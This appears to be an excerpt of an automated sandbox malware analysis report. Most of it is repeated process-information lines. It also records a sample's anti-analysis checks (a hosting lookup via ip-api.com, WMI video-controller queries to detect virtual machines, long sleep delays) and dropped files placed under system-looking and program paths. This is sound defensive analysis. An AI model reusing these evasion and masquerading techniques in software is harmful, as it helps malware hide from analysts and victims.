Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Brokercrt\comReviewsession.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 14C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1B1E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Memory allocated: AD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Memory allocated: 2800000 memory reserve \| memory write watch
Source: C:\Brokercrt\comReviewsession.exe	Memory allocated: 16B0000 memory reserve \| memory write watch
Source: C:\Brokercrt\comReviewsession.exe	Memory allocated: 1B2F0000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Memory allocated: 920000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Memory allocated: 1A3C0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Memory allocated: 1640000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Memory allocated: 1B190000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Memory allocated: C30000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Memory allocated: 1A800000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Memory allocated: 10B0000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Memory allocated: 1AD20000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599844
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599732
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599609
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599493
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599374
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598804
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598702
